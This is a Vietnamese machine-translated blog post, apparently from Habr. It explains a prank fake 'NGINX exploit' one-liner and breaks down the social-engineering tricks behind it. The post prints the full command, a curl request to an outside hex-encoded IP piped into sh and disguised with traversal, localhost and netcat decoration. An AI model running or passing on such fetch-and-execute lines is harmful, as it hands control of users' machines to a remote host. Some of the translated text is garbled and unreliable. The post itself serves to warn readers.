Ghi chú. bản dịch.:
TL;DR: Không sử dụng đường dẫn tệp trong sh hoặc bash trong mọi trường hợp. Đây là một cách tuyệt vời để mất quyền kiểm soát máy tính của bạn.
Tôi muốn chia sẻ với bạn một câu chuyện ngắn về cách khai thác PoC hài hước được tạo ra vào ngày 31 tháng XNUMX. Anh xuất hiện kịp thời trước tin tức từ
Sau khi hoàn thành việc nghiên cứu kỹ thuật che giấu mã nguồn mới trong Curl, tôi đã trích dẫn dòng tweet gốc và “làm rò rỉ một PoC đang hoạt động” bao gồm một dòng mã được cho là khai thác lỗ hổng được phát hiện. Tất nhiên, điều này hoàn toàn vô nghĩa. Tôi cho rằng mình sẽ bị lộ ngay lập tức và tốt nhất là tôi sẽ nhận được một vài lượt tweet lại (ồ thôi).
Tuy nhiên, tôi không thể tưởng tượng được chuyện gì xảy ra tiếp theo. Mức độ phổ biến của tweet của tôi tăng vọt. Điều đáng ngạc nhiên là ở thời điểm hiện tại (15h giờ Matxcơva ngày 00/1) rất ít người nhận ra đây là hàng giả. Nhiều người retweet nó mà không hề kiểm tra nó (chưa nói đến việc chiêm ngưỡng đồ họa ASCII đáng yêu mà nó tạo ra).
Chỉ cần nhìn nó đẹp làm sao!
Mặc dù tất cả các vòng lặp và màu sắc này đều tuyệt vời nhưng rõ ràng là mọi người phải chạy mã trên máy của họ để xem chúng. May mắn thay, các trình duyệt hoạt động theo cách tương tự và kết hợp với thực tế là tôi không thực sự muốn gặp rắc rối pháp lý, mã ẩn trong trang web của tôi chỉ thực hiện lệnh gọi echo mà không cố gắng cài đặt hoặc thực thi bất kỳ mã bổ sung nào.
Lạc đề nhỏ:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Kỹ thuật điện tử xã hội (SEE) - không chỉ là lừa đảo
Sự an toàn và quen thuộc là một phần quan trọng của thử nghiệm này. Tôi nghĩ chúng là nguyên nhân dẫn đến thành công của anh ấy. Dòng lệnh ngụ ý rõ ràng về bảo mật bằng cách tham chiếu đến "127.0.0.1" (localhost nổi tiếng). Localhost được coi là an toàn và dữ liệu trên đó không bao giờ rời khỏi máy tính của bạn.
Sự quen thuộc là thành phần XEM quan trọng thứ hai của thử nghiệm. Vì đối tượng mục tiêu chủ yếu bao gồm những người quen thuộc với những kiến thức cơ bản về bảo mật máy tính nên điều quan trọng là phải tạo mã sao cho các phần của mã có vẻ quen thuộc và quen thuộc (và do đó an toàn). Việc vay mượn các yếu tố của các khái niệm khai thác cũ và kết hợp chúng theo một cách khác thường đã được chứng minh là rất thành công.
Dưới đây là một phân tích chi tiết về một lớp lót. Mọi thứ trong danh sách này đều mặc bản chất mỹ phẩmvà thực tế không cần gì cho hoạt động thực sự của nó.
Những thành phần nào thực sự cần thiết? Cái này -gsS
, -O 0x0238f06a
, |sh
và chính máy chủ web. Máy chủ web không chứa bất kỳ hướng dẫn độc hại nào mà chỉ cung cấp đồ họa ASCII bằng các lệnh echo
trong kịch bản có trong index.html
. Khi người dùng nhập một dòng với |sh
ở giữa, index.html
được tải và thực thi. May mắn thay, những người trông coi máy chủ web không có ý đồ xấu.
-
../../../%00
— đại diện cho việc vượt ra ngoài thư mục; -
ngx_stream_module.so
- đường dẫn đến mô-đun NGINX ngẫu nhiên; -
/bin/sh%00<'protocol:TCP'
- chúng tôi được cho là đang khởi động/bin/sh
trên máy mục tiêu và chuyển hướng đầu ra sang kênh TCP; -
-O 0x0238f06a#PLToffset
- thành phần bí mật, bổ sung#PLToffset
, để trông giống như phần bù bộ nhớ bằng cách nào đó có trong PLT; -
|sh;
- một mảnh quan trọng khác. Chúng tôi cần chuyển hướng đầu ra sang sh/bash để thực thi mã đến từ máy chủ web tấn công đặt tại0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- một hình nộm trong đó netcat đề cập đến/dev/tcp/localhost
để mọi thứ có vẻ an toàn trở lại. Trên thực tế, nó không có tác dụng gì và được xếp vào dòng sản phẩm làm đẹp.
Điều này kết thúc phần giải mã tập lệnh một dòng và thảo luận về các khía cạnh của “kỹ thuật điện tử xã hội” (lừa đảo phức tạp).
Cấu hình máy chủ web và biện pháp đối phó
Vì đại đa số người đăng ký của tôi là an toàn thông tin/tin tặc nên tôi quyết định làm cho máy chủ web có khả năng chống lại những biểu hiện “quan tâm” từ phía họ, chỉ để mọi người có việc gì đó để làm (và sẽ rất vui khi được làm điều đó). cài đặt). Tôi sẽ không liệt kê tất cả các cạm bẫy ở đây vì thử nghiệm vẫn đang tiếp diễn, nhưng đây là một số điều mà máy chủ thực hiện:
- Tích cực giám sát các nỗ lực phân phối trên một số mạng xã hội nhất định và thay thế các hình thu nhỏ xem trước khác nhau để khuyến khích người dùng nhấp vào liên kết.
- Chuyển hướng Chrome/Mozilla/Safari/etc sang video quảng cáo Thugcrowd thay vì hiển thị tập lệnh shell.
- Theo dõi các dấu hiệu RẤT NHIỀU của sự xâm nhập/hack trắng trợn và sau đó bắt đầu chuyển hướng các yêu cầu đến máy chủ NSA (ha!).
- Cài đặt một Trojan, cũng như một rootkit BIOS, trên tất cả các máy tính mà người dùng truy cập vào máy chủ từ một trình duyệt thông thường (đùa thôi!).
Một phần nhỏ của chất phản kháng
Trong trường hợp này, mục tiêu duy nhất của tôi là nắm vững một số tính năng của Apache - đặc biệt là các quy tắc thú vị để chuyển hướng yêu cầu - và tôi nghĩ: tại sao không?
Khai thác NGINX (Có thật!)
Theo dõi
Nguồn: www.habr.com